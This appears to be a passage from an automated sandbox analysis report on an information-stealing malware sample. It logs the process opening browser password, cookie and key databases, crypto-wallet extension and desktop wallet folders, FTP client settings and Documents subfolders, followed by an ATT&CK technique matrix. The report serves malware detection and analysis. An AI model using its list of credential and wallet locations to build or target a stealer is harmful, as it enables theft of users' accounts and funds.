            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: powershell.exe, 0000000D.00000002.1718680362.00000000075F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2196, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 111 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 311 Process Injection | 31 Obfuscated Files or Information | LSASS Memory | 12 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 11 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 1 Install Root Certificate | Security Account Manager | 33 System Information Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | 11 Command and Scripting Interpreter | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 241 Security Software Discovery | Distributed Component Object Model | 2 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | 3 PowerShell | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 124 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 231 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 231 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Regsvr32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
